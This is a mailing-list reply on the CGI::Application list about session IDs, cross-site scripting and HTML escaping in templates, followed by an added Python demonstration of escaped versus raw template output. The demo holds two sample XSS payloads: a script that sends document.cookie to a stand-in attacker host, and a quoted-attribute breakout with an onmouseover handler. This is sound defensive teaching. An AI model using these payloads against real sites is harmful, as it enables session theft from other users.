[cgiapp] Persistence

Michael Peters mpeters at plusthree.com
Wed Feb 6 17:16:47 EST 2008



Mark Fuller wrote:
>>>> o Add the session id to the URL. This method has the most problems, and
>>>> is not recommended.
>>> What are the problems with the last option? ...
>> Google for XSS - Cross-site scripting attacks, as a starter.
> 
> I thought the problem with putting the session ID in the URL is that
> the user might copy/paste the URL to others. When they try to use it,
> the app would have no way to know it's not the real user?

While that is a problem (it holds true with any user-identifiable information,
not just sessions; you need to especially watch what you put into emails, since
they will get forwarded), it's not XSS.

XSS is Cross Site Scripting. So you need 2 domains (hence the cross-site) and it
involves Javascript (it can also be ActionScript/Flash, VBScript, or any other
future client-side scripting language). Basically it's a problem of people
embedding Javascript into a page that others will see. That Javascript can steal
sessions, etc., from the user who sees it. It doesn't matter if the session id is
in the URL or a cookie; Javascript can see both.

This is why escaping any data that could potentially come from a user is so
important.

  <tmpl_var foo escape=html>
or
  [% foo | html %]

-- 
Michael Peters
Developer
Plus Three, LP
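The following is an added example, not code from the post above or from CGI::Application. It is in Python rather than Perl so that it runs with the standard library alone, and it uses a hypothetical toy renderer whose tag syntax is modelled on Template Toolkit ("[% name %]" raw, "[% name | html %]" escaped); it is not Template Toolkit or HTML::Template themselves. The payloads are constructed sample inputs. It shows what the escape filter on the page does (the same job as escape=html in HTML::Template) and why the filter must also escape double quotes: once the value lands inside an attribute, an unescaped quote closes the attribute and lets the input add an event handler.

```python
import html
import re

# Hypothetical stand-in for a template engine's variable tag, modelled on
# Template Toolkit syntax: "[% name %]" (raw) or "[% name | html %]" (escaped).
# This is a toy renderer for illustration, not Template Toolkit or HTML::Template.
TAG = re.compile(r"\[%\s*(\w+)\s*(?:\|\s*(\w+)\s*)?%\]")


def html_filter(value):
    """What an 'html' escape filter does: & < > \" ' become entities, so the
    value can never close the tag or the attribute it was interpolated into."""
    return html.escape(str(value), quote=True)


FILTERS = {"html": html_filter}


def render(template, params):
    """Substitute [% ... %] tags; apply a filter only when the tag asks for one."""
    def substitute(match):
        name, filter_name = match.group(1), match.group(2)
        value = str(params[name])
        if filter_name is None:
            return value                      # raw interpolation: XSS-prone
        return FILTERS[filter_name](value)    # escaped interpolation
    return TAG.sub(substitute, template)


def has_script_tag(markup):
    """Crude check, used only to show the difference between the two outputs."""
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


# Constructed sample input: a "display name" submitted by one user that carries
# a cookie-stealing payload. Every other visitor who views the page would run it.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'

# Constructed sample input for the attribute case: breaks out of a quoted
# attribute unless the double quote is escaped as well.
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'

UNSAFE_BODY = "<p>Posted by [% name %]</p>"
SAFE_BODY = "<p>Posted by [% name | html %]</p>"
UNSAFE_ATTR = '<input name="nick" value="[% name %]">'
SAFE_ATTR = '<input name="nick" value="[% name | html %]">'


def render_all():
    """Return the four renderings so they can be inspected or asserted on."""
    return {
        "unsafe_body": render(UNSAFE_BODY, {"name": PAYLOAD}),
        "safe_body": render(SAFE_BODY, {"name": PAYLOAD}),
        "unsafe_attr": render(UNSAFE_ATTR, {"name": ATTR_PAYLOAD}),
        "safe_attr": render(SAFE_ATTR, {"name": ATTR_PAYLOAD}),
    }


if __name__ == "__main__":
    for label, markup in render_all().items():
        print(f"{label}: {markup}")
```

Note that the attribute case only stays safe because the template itself quotes the attribute (value="[% name | html %]"); an unquoted value=[% name | html %] is still injectable with a space, since the filter never touches whitespace. Escape at output time, in the template, for every value that may have come from a user, rather than trying to filter on input.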
